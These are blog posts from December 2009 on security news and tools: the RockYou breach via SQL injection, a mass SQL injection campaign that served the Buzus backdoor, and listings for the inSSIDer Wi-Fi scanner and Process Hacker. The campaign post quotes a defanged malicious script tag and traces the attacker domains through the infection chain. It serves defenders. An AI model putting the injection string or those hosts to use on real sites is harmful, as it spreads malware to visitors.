Dec 16 2009

RockYou Hacked – 32 Million Account Passwords Potentially Exposed

RockYou Hacked
RockYou has suffered a serious hacker attack that has exposed 32 million of its customer usernames and passwords to possible identity theft. And it has apparently taken RockYou more than 10 days to inform its users of the breach.

The security firm Imperva informed RockYou that its site had a serious SQL injection flaw, according to reports. Imperva said that some users’ passwords had already been compromised as a result of the vulnerability by the time it notified RockYou of its findings. RockYou acted quickly to fix the flaw, but perhaps not fast enough. One hacker claimed to have gotten access to the accounts and posted some data as proof. Apparently, the database included the full list of unencrypted passwords in plain text.

The flaw is a big one because RockYou usernames and passwords are, by default, the same as users’ email names and passwords. Security experts are advising RockYou users to change their emails and passwords. RockYou has some of the most popular apps on Facebook, and it ranks third among Facebook developers with 55 million monthly active users, according to AppData.

SQL injection exploits a vulnerability in an app’s database layer and is a very common attack. It potentially lets hackers steal private information, and Yahoo’s jobs site recently suffered a similar attack. Imperva chief technology officer Amichai Shulman told eWeek Europe that users are particularly vulnerable if they use the same usernames and passwords for all of the sites that they visit.

In a statement to Techcrunch, RockYou said, “On December 4, RockYou’s IT team was alerted that the user database on RockYou.com had been compromised, potentially revealing some personal identification data for approximately 30M registered users on RockYou.com. RockYou immediately brought down the site and kept it down until a security patch was in place. RockYou confirms that no application accounts on Facebook were impacted by this hack and that most of the accounts affected were for earlier applications (including slideshow, glitter text, fun notes) that are no longer formally supported by the company. RockYou has secured the site and is in the process of informing all registered users that the hack took place.”

RockYou said it is planning to notify users. As others have noted, 10 days after it learned of the breach is far too late.

Source: DigitalBeat

Dec 14 2009

inSSIDer – Wi-Fi Network Scanner For Windows

inSSIDer is an award-winning free Wi-Fi network scanner for Windows Vista and Windows XP. Because NetStumbler doesn’t work well with Vista and 64-bit XP, an open-source Wi-Fi network scanner designed for the current generation of Windows operating systems.

inSSIDer

What’s Unique about inSSIDer?

  • Use Windows Vista and Windows XP 64-bit.
  • Uses the Native Wi-Fi API.
  • Group by Mac Address, SSID, Channel, RSSI and “Time Last Seen”.
  • Compatible with most GPS devices (NMEA v2.3 and higher).

How can inSSIDer help me?

  • Inspect your WLAN and surrounding networks to troubleshoot competing access points.
  • Track the strength of received signal in dBm over time.
  • Filter access points in an easy to use format.
  • Highlight access points for areas with high Wi-Fi concentration.
  • Export Wi-Fi and GPS data to a KML file to view in Google Earth.

Download: Inssider_Installer.msi

More Info: inSSIDer Wi-Fi Scanner | Metageek

Dec 12 2009

SQL Injection Attack Claims 132,000+

A large scale SQL injection attack has injected a malicious iframe on tens of thousands of susceptible websites. ScanSafe reports that the injected iframe loads malicious content from 318x.com, which eventually leads to the installation of a rootkit-enabled variant of the Buzus backdoor trojan. A Google search on the iframe resulted in over 132,000 hits as of December 10, 2009.

SQL Injection

Infection sequence:
Injected iframe – <script src=hxxp://318x.com>
Executes a script that creates a new iframe to 318x.com/a.htm. That iframe (a.htm) does 2 things:

1. Loads a second iframe from aa1100.2288.org/htmlasp/dasp/alt.html
2. Loads a script: js.tongji.linezing.com/1358779/tongji.js (used for tracking).

The aa1100.2288.org/htmlasp/dasp/alt.html frame:

* Creates a third iframe pointing to aa1100.2288.org/htmlasp/dasp/share.html
* Loads a script: js.tongji.linezing.com/1364067/tongji.js (similar to above, but different number)
* If <noscript> it has an href tag that points to www.linezing.com with an img src of img.tongji.linezing.com/1364067/tongji.gif

The share.html detects browser type and writes/loads multiple iframes pointing to obfuscated script files located in the same directory (all are javascript regardless of extension). The combined action results in checks for MDAC, OWC10, and various versions of Adobe Flash. Depending on the results, the malcode then delivers one of several possible exploits.

Observed Exploits Include:

  • Integer overflow vulnerability in Adobe Flash Player, described in CVE-2007-0071
  • MDAC ADODB.Connection ActiveX vulnerability described in MS07-009
  • Microsoft Office Web Components vulnerabilities described in MS09-043
  • Microsoft video ActiveX vulnerability described in MS09-032
  • Internet Explorer Uninitialized Memory Corruption Vulnerability – MS09-002.

Malware Description:
Threatname: Backdoor.Win32.Buzus.croo
Aliases: Trojan-PWS.Win32.Lmir (Ikarus, a-squared); TR/Hijacker.Gen (AntiVir); Trojan/Win32.Buzus.gen (Antiy-AVL); W32/Agent.S.gen!Eldorado (F-Prot, Authentium); Win32:Rootkit-gen (Avast); Generic15.CBGO (AVG); Trojan.Generic.2823971 (BitDefender, GData); Trojan.Buzus.croo (Kaspersky, QuickHeal); Trojan.NtRootKit.2909 (DrWeb); Trj/Buzus.AH (Panda).

Source: Net-Security

Dec 12 2009

Process Hacker

Process Hacker is a free and open source process viewer and memory editor with unique features such as powerful process termination and a Regex memory searcher. It can show services, processes and their threads, modules, handles and memory regions.

Process Hacker

Key Features:

  • Viewing, terminating, suspending and resuming processes.
  • Restarting processes, creating dump files, detaching from any debuggers, viewing heaps, injecting DLLs, etc.
  • Viewing detailed process information, statistics, and performance information.
  • Viewing, terminating, suspending and resuming threads.
  • Viewing detailed token information (including modifying privileges).
  • Viewing and unloading modules.
  • Viewing memory regions.
  • Viewing environment variables.
  • Viewing and closing handles.
  • Viewing, controlling and editing services.
  • Viewing and closing network connections.

System Requirements:

  • .NET Framework 2.0
  • Microsoft Windows XP SP2 or above, 32-bit or 64-bit.

Latest Release: Process Hacker 1.8

Download: processhacker-1.8-setup.exe

More Info: Home – Process Hacker